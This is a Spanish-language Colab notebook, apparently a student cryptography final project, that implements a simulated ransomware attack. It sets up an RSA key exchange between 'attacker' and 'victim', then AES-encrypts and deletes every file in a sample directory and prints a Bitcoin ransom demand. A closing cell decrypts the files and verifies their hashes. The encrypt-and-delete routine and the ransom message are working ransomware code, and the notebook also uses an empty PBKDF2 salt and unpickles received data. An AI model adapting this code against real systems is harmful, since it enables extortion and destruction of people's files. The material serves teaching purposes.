# Criptografía - Final

## **Nombre de los Estudiantes:**

- Cristian Cubillos
- Emanuel Escobar
- David Escorcia
- Fredy Fajardo


In [1]:
!pip install pycryptodome
!pip install cryptography

   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 2.3/2.3 MB 6.5 MB/s eta 0:00:00


In [2]:
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_OAEP, AES
from Crypto.Hash import SHA256
from Crypto.Signature import pkcs1_15
from Crypto.Util.Padding import pad, unpad
from Crypto.Random import get_random_bytes
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.scrypt import Scrypt
import os
import pickle
import hashlib

In [3]:
def generar_claves_rsa():
    return RSA.generate(2048)

def crear_certificado(key, identifier):
    public_key = key.publickey().export_key()
    return {'id': identifier, 'pk': public_key}

def firmar_datos(private_key, data):
    # HASH Y LUEGO FIRMA
    h = SHA256.new(data)
    signature = pkcs1_15.new(private_key).sign(h)
    return signature

def verificar_firma(public_key, data, signature):
    h = SHA256.new(data)
    try:
        pkcs1_15.new(public_key).verify(h, signature)
        return True
    except (ValueError, TypeError):
        return False

def encriptar_rsa(public_key, data):
    cipher = PKCS1_OAEP.new(public_key)
    return cipher.encrypt(data)

def desencriptar_rsa(private_key, encrypted_data):
    cipher = PKCS1_OAEP.new(private_key)
    return cipher.decrypt(encrypted_data)

def generar_bytes_aleatorios():
    return get_random_bytes(1024)

def generar_clave_aes_a_partir_de_contrasena(password: bytes, salt: bytes = None) -> bytes:
    if salt is None:
          salt = b''  # Utiliza un salt vacío si no se proporciona uno
    # Parámetros de PBKDF2
    kdf = PBKDF2HMAC(
        algorithm=hashes.SHA256(),
        length=32,  # Genera una llave AES de 256 bits
        salt=salt,
        iterations=100000,
        backend=default_backend()
    )
    key = kdf.derive(password)
    return key

def encriptar_archivo(file_path, aes_key):
    block_size = AES.block_size
    with open(file_path, 'rb') as file:
        file_data = file.read()
    cipher = AES.new(aes_key, AES.MODE_CBC)
    ciphered_data = cipher.encrypt(pad(file_data, block_size))
    iv = cipher.iv
    enc_file_path = file_path + '.enc'
    with open(enc_file_path, 'wb') as enc_file:
        enc_file.write(iv + ciphered_data)  # Save IV and ciphered data together
    os.remove(file_path)
    return enc_file_path


def desencriptar_archivo(encrypted_file_path, aes_key):
    with open(encrypted_file_path, 'rb') as enc_file:
        file_content = enc_file.read()

    iv = file_content[:AES.block_size]
    ciphered_data = file_content[AES.block_size:]

    cipher = AES.new(aes_key, AES.MODE_CBC, iv)
    plaintext = unpad(cipher.decrypt(ciphered_data), AES.block_size)

    orig_file_path = encrypted_file_path.replace('.enc', '')
    with open(orig_file_path, 'wb') as dec_file:
        dec_file.write(plaintext)
    os.remove(encrypted_file_path)
    return orig_file_path

def calcular_fichero_hash(file_path):
    hash_sha256 = hashlib.sha256()
    with open(file_path, 'rb') as file:
        for chunk in iter(lambda: file.read(4096), b""):
            hash_sha256.update(chunk)
    return hash_sha256.hexdigest()

In [12]:
# === Configuración Inicial ===
llave_atacante = generar_claves_rsa()
llave_victima = generar_claves_rsa()

certificado_atacante = crear_certificado(llave_atacante, "Attacker")
certificado_víctima = crear_certificado(llave_victima, "Victim")

# === Intercambio de Claves (Parte A y Parte B) ===
llaves_temporales = generar_claves_rsa()
llave_publica_temp = llaves_temporales.public_key().export_key()

# Parte de A (Víctima)
firma_llave_temp = firmar_datos(llave_victima, llave_publica_temp)

# Parte de B (Atacante)
id_victima = certificado_víctima['id']
clave_publica_victima = certificado_víctima['pk']

if (verificar_firma(RSA.import_key(clave_publica_victima),llave_publica_temp,firma_llave_temp)):
  clave_secreta_compartida = os.urandom(128)
  paquete_cifrado = pickle.dumps((clave_secreta_compartida, certificado_atacante['id']))
  datos_cifrados = encriptar_rsa(RSA.import_key(llave_publica_temp),paquete_cifrado)
  paquete_firmado = pickle.dumps((llave_publica_temp,datos_cifrados,id_victima))
  firma_paquete = firmar_datos(llave_atacante, paquete_firmado)

# Parte de A (Víctima recibe y verifica)
id_atacante = certificado_atacante['id']
clave_publica_atacante = certificado_atacante['pk']

if (verificar_firma(RSA.import_key(clave_publica_atacante),paquete_firmado,firma_paquete)):
  datos_descifrados = desencriptar_rsa(RSA.import_key(llaves_temporales.export_key()),datos_cifrados)
  try:
      # Intenta deserializar los datos
      clave_secreta , identidad_atacante  = pickle.loads(datos_descifrados)
  except pickle.UnpicklingError as e:
      print("Error al deserializar los datos:", e)


# === Encriptado de Archivos ===
llave_aes = generar_clave_aes_a_partir_de_contrasena(clave_secreta_compartida)
directorio_datos = '/content/sample_data'
archivos = os.listdir(directorio_datos)

hashes_archivos = {}
for archivo in archivos:
    ruta_completa = os.path.join(directorio_datos, archivo)
    hashes_archivos[archivo] = calcular_fichero_hash(ruta_completa)
    ruta_cifrada = encriptar_archivo(ruta_completa, llave_aes)
    print(f"Archivo {archivo} cifrado como {ruta_cifrada}.")

ruta_hashes = os.path.join(directorio_datos, 'hashes_archivos.pkl')
with open(ruta_hashes, 'wb') as archivo_hashes:
    pickle.dump(hashes_archivos, archivo_hashes)

# === Notificación al Usuario ===
print("Todos sus archivos han sido cifrados. Envíe 1 Bitcoin a la dirección CEDF para recibir la llave de descifrado.")


Archivo README.md cifrado como /content/sample_data/README.md.enc.
Archivo anscombe.json cifrado como /content/sample_data/anscombe.json.enc.
Archivo california_housing_train.csv cifrado como /content/sample_data/california_housing_train.csv.enc.
Archivo california_housing_test.csv cifrado como /content/sample_data/california_housing_test.csv.enc.
Archivo mnist_train_small.csv cifrado como /content/sample_data/mnist_train_small.csv.enc.
Archivo mnist_test.csv cifrado como /content/sample_data/mnist_test.csv.enc.
Todos sus archivos han sido cifrados. Envíe 1 Bitcoin a la dirección CEDF para recibir la llave de descifrado.


In [13]:
# === Paso 5: Verificar y Descifrar Archivos ===

# Cargar los hashes almacenados previamente
ruta_archivo_hashes = os.path.join(directorio_datos, "hashes_archivos.pkl")
with open(ruta_archivo_hashes, "rb") as archivo:
    registros_hashes = pickle.load(archivo)

# Iterar sobre los archivos cifrados para descifrarlos y verificar su integridad
for archivo_cifrado in archivos:
    ruta_archivo_cifrado = os.path.join(directorio_datos, archivo_cifrado + ".enc")
    ruta_descifrada = desencriptar_archivo(ruta_archivo_cifrado, llave_aes)

    # Calcular el hash del archivo descifrado
    hash_recalculado = calcular_fichero_hash(ruta_descifrada)

    # Recuperar el hash original del archivo
    hash_original = registros_hashes.get(archivo_cifrado)

    # Verificar la correspondencia entre los hashes
    if hash_recalculado == hash_original:
        print(f"Archivo {ruta_descifrada} descifrado correctamente y su integridad ha sido confirmada.")
    else:
        print(f"Archivo {ruta_descifrada} descifrado pero no pasó la verificación de integridad.")

# Eliminar el archivo que contiene los hashes originales
os.remove(ruta_archivo_hashes)

Archivo /content/sample_data/README.md descifrado correctamente y su integridad ha sido confirmada.
Archivo /content/sample_data/anscombe.json descifrado correctamente y su integridad ha sido confirmada.
Archivo /content/sample_data/california_housing_train.csv descifrado correctamente y su integridad ha sido confirmada.
Archivo /content/sample_data/california_housing_test.csv descifrado correctamente y su integridad ha sido confirmada.
Archivo /content/sample_data/mnist_train_small.csv descifrado correctamente y su integridad ha sido confirmada.
Archivo /content/sample_data/mnist_test.csv descifrado correctamente y su integridad ha sido confirmada.
